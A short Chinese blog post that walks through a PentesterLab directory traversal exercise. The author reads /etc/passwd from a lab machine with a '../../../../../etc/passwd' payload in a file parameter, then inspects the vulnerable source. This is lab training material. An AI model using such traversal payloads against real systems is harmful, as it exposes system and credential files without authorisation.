0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全目录穿越-EXP2


我们打开第二个图片


PentestLab-web安全目录穿越-EXP2_修改文件


进行观察


PentestLab-web安全目录穿越-EXP2_文件名_02


跟上一关一样,我们观察得知

我们尝试修改文件名称


http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/etc/passwd


结果空白


PentestLab-web安全目录穿越-EXP2_修改文件_03


可能是不存在这个目录


我们尝试


http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd


结果


PentestLab-web安全目录穿越-EXP2_php_04


我们打开靶机

观察源码


PentestLab-web安全目录穿越-EXP2_修改文件_05


发现会给一个文件名加上一个文件目录路径

然而容易被../../进行过滤

举报

相关推荐

0 条评论